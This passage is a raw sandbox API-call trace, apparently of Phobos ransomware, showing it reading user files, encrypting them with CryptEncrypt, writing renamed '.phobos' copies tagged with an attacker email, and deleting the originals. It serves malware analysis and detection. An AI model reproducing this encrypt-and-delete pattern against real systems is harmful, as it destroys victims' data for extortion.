pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.507] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4734) returned 1 [0202.507] CloseHandle (hObject=0x100) returned 1 [0202.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg")) returned 0x2020 [0202.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.507] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.507] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.508] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.508] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.508] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x127e, lpOverlapped=0x0) returned 1 [0202.510] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1280, dwBufLen=0x1280 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1280) returned 1 [0202.511] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1280, lpOverlapped=0x0) returned 1 [0202.511] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.511] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.511] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0202.511] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.511] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0202.512] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.512] CloseHandle (hObject=0x100) returned 1 [0202.512] CloseHandle (hObject=0x174) returned 1 [0202.512] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg")) returned 1 [0202.513] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.515] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=232) returned 1 [0202.515] CloseHandle (hObject=0x174) returned 1 [0202.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm")) returned 0x2020 [0202.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.515] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.515] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.516] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.516] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.516] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe8, lpOverlapped=0x0) returned 1 [0202.517] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0202.517] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0202.518] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.518] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.518] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.518] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.518] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.518] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.518] CloseHandle (hObject=0x174) returned 1 [0202.518] CloseHandle (hObject=0x100) returned 1 [0202.518] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm")) returned 1 [0202.519] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.559] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10569) returned 1 [0202.559] CloseHandle (hObject=0x100) returned 1 [0202.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg")) returned 0x2020 [0202.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.560] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.560] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.582] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.582] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.582] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2949, lpOverlapped=0x0) returned 1 [0202.702] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2950, dwBufLen=0x2950 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2950) returned 1 [0202.702] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2950, lpOverlapped=0x0) returned 1 [0202.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0202.703] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.703] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.703] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.703] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.703] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.703] CloseHandle (hObject=0x100) returned 1 [0202.703] CloseHandle (hObject=0x13c) returned 1 [0202.704] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg")) returned 1 [0202.704] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.705] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=84) returned 1 [0202.705] CloseHandle (hObject=0x13c) returned 1 [0202.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini")) returned 0x2020 [0202.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.705] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.706] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.706] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.706] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.706] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x54, lpOverlapped=0x0) returned 1 [0202.707] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0202.707] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0202.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0202.708] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.708] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.708] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.708] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.708] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.708] CloseHandle (hObject=0x13c) returned 1 [0202.708] CloseHandle (hObject=0x100) returned 1 [0202.708] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini")) returned 1 [0202.709] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.710] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=0) returned 1 [0202.710] CloseHandle (hObject=0x100) returned 1 [0202.710] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.710] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=146) returned 1 [0202.710] CloseHandle (hObject=0x100) returned 1 [0202.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini")) returned 0x26 [0202.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.710] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.710] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.711] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.711] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x92, lpOverlapped=0x0) returned 1 [0202.715] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0202.715] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa0, lpOverlapped=0x0) returned 1 [0202.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0202.716] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.716] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.716] CryptDestroyKey (hKey=0xa32be8) returned 1 [0202.716] WriteFile (in: hFile=0x13c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.716] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.716] CloseHandle (hObject=0x100) returned 1 [0202.716] CloseHandle (hObject=0x13c) returned 1 [0202.716] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini")) returned 1 [0202.717] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.718] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=211) returned 1 [0202.718] CloseHandle (hObject=0x13c) returned 1 [0202.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini")) returned 0x26 [0202.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.718] 